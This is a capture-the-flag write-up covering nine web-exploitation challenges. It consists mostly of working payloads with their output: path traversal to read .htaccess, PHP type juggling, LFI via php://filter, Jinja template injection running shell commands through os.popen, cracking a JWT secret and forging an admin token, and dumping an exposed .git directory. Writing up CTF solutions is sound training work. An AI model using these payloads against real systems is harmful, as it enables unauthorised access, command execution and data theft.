Tags: flask web
Rating:
<h1 align="center">Web Exploitation</h1>
<h3>Hot Access 70 points</h3>
Access to all the latest modules, hot off the press! What can you access?
Connect here: http://jh2i.com:50016
```shell
http://jh2i.com:50016/?m=modules/../.htaccess
<Directory /var/www/html>Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory><Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here>
AllowOverride All
</Directory>
http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txt
LLS{htaccess_can_control_what_you_access}
Flag: LLS{htaccess_can_control_what_you_access}
```
<h3>PHPJuggler 80 points</h3>
PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!
Connect here: http://jh2i.com:50030.
``` shell
Php Type Juggling strcmp:
submit POST requests with flag[]=flag
Warning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6
You got it! That's the correct flag!
LLS{php_dropped_the_ball_again}
Flag: LLS{php_dropped_the_ball_again}
```
<h3>Magician 80 points</h3>
Show me a hat trick!
Connect here: http://jh2i.com:50000
``` shell
Magic Hash as whihehat security or 247CTF!!!:
hash ==> 0e908377363673038390833004129775
password ==> f789bbc328a3d1a3e4UPoL
Flag: LLS{magic_hashes_make_for_a_good_show}
```
<h3>GLHF 90 points</h3>
LMFAO! FLAG PLZ, THX!
Connect here: http://jh2i.com:50014
``` shell
Local file inclusion: LFI:
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG
<html>
<head>
<title> PHPLFIXYZ </title>
</head>
<body>
<h1> FLAG???? </h1>
<h1> WTF, PLZ??? </h1>
</body>
</html>
Flag: LLS{lmfao_php_filters_ftw}
```
<h3>MASK 90 points</h3>
Take off your mask.
Connect here: http://jh2i.com:50023.
``` shell
Server Side Template Injection:
test ==> {{7*7}} response 49
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
```
``` shell
{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
Flag: LLS{server_side_template_injection_unmasked}
```
<h3>JaWT 90 points</h3>
Check the admin's scratchpad!
Connect here: http://jh2i.com:50019/
``` shell
Challenge as PicoCTF and use crackjwt.py
FOR JOHN
python crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dic
Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc
1648it [00:00, 6560.78it/s]
('Found secret key:', 'fuckit')
FOR ADMIN
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0
Change value of cookie jwt
Hello admin!
Here is your JaWT scratchpad!
LLS{jawt_was_just_what_you_thought}
Flag: LLS{jawt_was_just_what_you_thought}
```
<h3>10 Character Web Shell 100 points</h3>
Only 10 char--
Connect here: http://jh2i.com:50001.
``` shell
http://jh2i.com:50001/?c=cat%20flag*
```
``` shell
Flag: LLS{you_really_can_see_in_the_dark}
```
<h3>Dairy Products 100 points</h3>
There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.
Connect here: http://142.93.3.19:50008
```shell
Just use wget because gitdumper.sh don't download repo.
wget -r --no-parent http://142.93.3.19:50008/.git/
git status
git --no-pager log -p | grep LLS{
LLS{you_gitm_gotm_good_partner}
Flag: LLS{you_gitm_gotm_good_partner}
```
<h3>GET Encoded 125 points</h3>
I don't GET this%21 Do you%3F
Connect here: http://jh2i.com:50013
```shell
robots.txt with /?debug
```
```shell
http://jh2i.com:50013/?%73ystem=ls
flag_that_you_could_never_guess.php
index.php
robots.txt
Machines hunt for more than humans do.
http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php
Machines hunt for more than humans do.
Flag: LLS{i_gotcha_url_encoding}
```